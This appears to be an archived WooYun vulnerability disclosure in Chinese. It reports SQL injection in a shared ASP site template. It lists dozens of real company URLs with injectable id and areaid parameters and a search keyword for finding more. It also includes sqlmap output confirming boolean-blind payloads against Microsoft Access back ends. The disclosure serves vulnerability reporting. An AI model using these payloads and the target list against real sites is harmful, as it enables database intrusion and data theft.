乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-17: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-02-15: 厂商已经主动忽略漏洞,细节向公众公开
RT.
官网:www.81886.cnhttp://www.81886.cn/contact.asp?id=36http://www.81886.cn/cases.asp?areaid=243http://www.81886.cn/news_show.asp?id=123搜索引擎关键字:技术支持:新奇网络
http://www.scbzkjgg.com/contact.asp?id=4http://www.ylhwj.com/Contact.asp?Id=11http://lsjgkj.com/Contact.asp?Id=11http://www.hyteng.com/contact.asp?id=4http://szyoudun.com/contact.asp?id=4http://www.hadadv.com/Contact.asp?Id=11http://www.xkhfm.com/Contact.asp?Id=11http://www.szwmk.com/contact.asp?id=4http://www.yatengmotor.com/contact.asp?id=36http://www.aidazs.com/contact.asp?id=4http://www.szhsdjx.com/contact.asp?id=4 http://szjdjx.com/contact.asp?id=4http://www.jsfscps.com/contact.asp?id=4http://www.zoboh.com/contact.asp?id=4http://www.dhcdhj.com/Contact.asp?Id=11http://www.szsts168.com/contact.asp?id=4http://www.xh2000.com/contact.asp?id=4http://www.szbtsg.com/Contact.asp?Id=11http://www.szysdnxh.com/Contact.asp?Id=11http://szwbgs.com/contact.asp?id=4http://holesh.com.cn/contact.asp?id=4http://www.dgxxzsj.com/contact.asp?id=36http://longxingfa888.com/contact.asp?id=4http://www.holesh.com.cn/contact.asp?id=4http://www.szwsdmj.com/contact.asp?id=36
2.产品展示处:http://www.yatengmotor.com/products.asp?areaid=237http://www.szfwxpcb.com/products.asp?areaid=234http://www.szpdxsp.com/products.asp?areaid=234http://www.szsrmj.com/products.asp?areaid=243http://www.flxchina.com.cn/products.asp?areaid=234http://www.xianglong888.cn/products.asp?areaid=244http://www.szhccnc.com/products.asp?areaid=247http://www.xlyssz.com/products.asp?areaid=234http://www.hongxinmold.com/products.asp?areaid=251http://www.dgxxzsj.com/products.asp?areaid=273http://www.hcxlyh.com/products.asp?areaid=245http://www.szjh3d.com/products.asp?areaid=257http://www.youzhutip.com/products.asp?areaid=255http://www.szwsdmj.com/products.asp?areaid=250http://www.yahuawujin.com/products.asp?areaid=262http://www.yongkangtong.com/products.asp?areaid=255http://chuangyaxin.net/products.asp?areaid=234http://www.nengxingwujin.com/products.asp?areaid=285http://sztfhs.com/products.asp?areaid=234
3.新闻动态处:http://www.szysdnxh.com/NewsShow.asp?Id=27http://www.szbtsg.com/NewsShow.asp?Id=63http://www.szjh3d.com/news_show.asp?id=9http://www.xlyssz.com/news_show.asp?id=9http://www.flxchina.com.cn/news_show.asp?id=10http://www.szwsdmj.com/news_show.asp?id=13http://www.dgxxzsj.com/news_show.asp?id=370http://www.yongkangtong.com/news_show.asp?id=13http://www.szfwxpcb.com/news_show.asp?id=73http://www.yatengmotor.com/news_show.asp?id=50http://www.szpdxsp.com/news_show.asp?id=9http://www.dhcdhj.com/NewsShow.asp?Id=69http://www.szsrmj.com/news_show.asp?id=32http://www.yahuawujin.com/news_show.asp?id=43http://www.youzhutip.com/news_show.asp?id=99http://www.hcxlyh.com/news_show.asp?id=9http://www.xianglong888.cn/news_show.asp?id=9http://www.szhccnc.com/news_show.asp?id=12http://www.hongxinmold.com/news_show.asp?id=11
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=36 AND 7513=7513---[10:15:12] [INFO] testing Microsoft Access[10:15:13] [INFO] confirming Microsoft Access[10:15:13] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access[10:15:13] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 65 times[10:15:13] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[10:15:13] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\??\??\SQLMAP~1\SQLMAP~1\Bin\output\www.81886.cn'
Place: GETParameter: areaid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: areaid=243 AND 3422=3422---[10:18:24] [INFO] testing Microsoft Access[10:18:24] [INFO] confirming Microsoft Access[10:18:25] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access[10:18:25] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 61 times[10:18:25] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[10:18:25] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\??\??\SQLMAP~1\SQLMAP~1\Bin\output\www.81886.cn'
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=12 AND 4627=4627---[10:19:10] [INFO] testing Microsoft Access[10:19:10] [INFO] confirming Microsoft Access[10:19:10] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access[10:19:10] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 72 times[10:19:10] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[10:19:10] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\??\??\SQLMAP~1\SQLMAP~1\Bin\output\www.szhccnc.com'
过滤。
未能联系到厂商或者厂商积极拒绝